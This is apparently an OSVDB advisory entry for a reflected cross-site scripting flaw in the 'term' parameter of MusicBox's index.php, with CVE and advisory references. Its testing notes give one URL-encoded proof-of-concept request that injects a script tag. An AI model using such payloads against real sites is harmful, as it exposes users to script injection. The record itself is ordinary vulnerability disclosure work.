MusicBox index.php term Variable XSS

2006-04-16T08:32:37
ID OSVDB:24635
Type osvdb
Reporter r0t(krustevs@googlemail.com)
Modified 2006-04-16T08:32:37

Description

Manual Testing Notes

/index.php?in=song&term=%22%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&action=search&start=0

References:

Vendor URL: http://www.musicboxv2.com/ Secunia Advisory ID:19672 Related OSVDB ID: 24636 Other Advisory URL: http://pridels.blogspot.com/2006/04/musicbox-vuln.html FrSIRT Advisory: ADV-2006-1373 CVE-2006-1806 Bugtraq ID: 17545